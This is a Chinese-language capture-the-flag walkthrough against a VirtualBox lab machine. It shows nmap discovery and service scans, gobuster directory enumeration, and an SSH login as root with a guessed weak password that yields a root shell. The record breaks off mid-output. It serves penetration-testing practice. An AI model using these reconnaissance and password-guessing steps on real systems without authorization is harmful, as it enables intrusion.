┌──(root㉿kali)-[~] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 10:32 CST Nmap scan report for 192.168.2.1 Host is up (0.00045s latency). MAC Address: 0A:00:27:00:00:0A (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.00073s latency). MAC Address: 08:00:27:51:E4:3B (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.36 Host is up (0.00062s latency). MAC Address: 08:00:27:08:75:F7 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds
IP地址:192.168.2.36
nmap扫描
1、全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~] └─# nmap --min-rate 10000 -p- 192.168.2.36 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 10:32 CST Nmap scan report for 192.168.2.36 Host is up (0.0013s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:08:75:F7 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 10.89 seconds
┌──(root㉿kali)-[~] └─# nmap -sT -sV -sC -O --min-rate 10000 -p22,80 192.168.2.36 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 10:33 CST Nmap scan report for 192.168.2.36 Host is up (0.00072s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.3 (protocol 2.0) | ssh-hostkey: | 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA) | 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA) |_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519) 80/tcp open http nginx |_http-title: Site doesnt have a title (text/html). MAC Address: 08:00:27:08:75:F7 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.63 seconds
┌──(root㉿kali)-[~] └─# gobuster dir -u http://192.168.2.36 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.36 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,bak,txt,html [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 57] Progress: 1102800 / 1102805 (100.00%) =============================================================== Finished ===============================================================
未发现其他目录
尝试SSH登录
尝试使用simple作为登录凭据
1 2 3 4 5 6 7 8 9 10 11
┌──(root㉿kali)-[~] └─# ssh root@192.168.2.36 The authenticity of host '192.168.2.36 (192.168.2.36)' can't be established. ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.2.36' (ED25519) to the list of known hosts. root@192.168.2.36's password: IM AN SSH SERVER gift:~# id uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialou
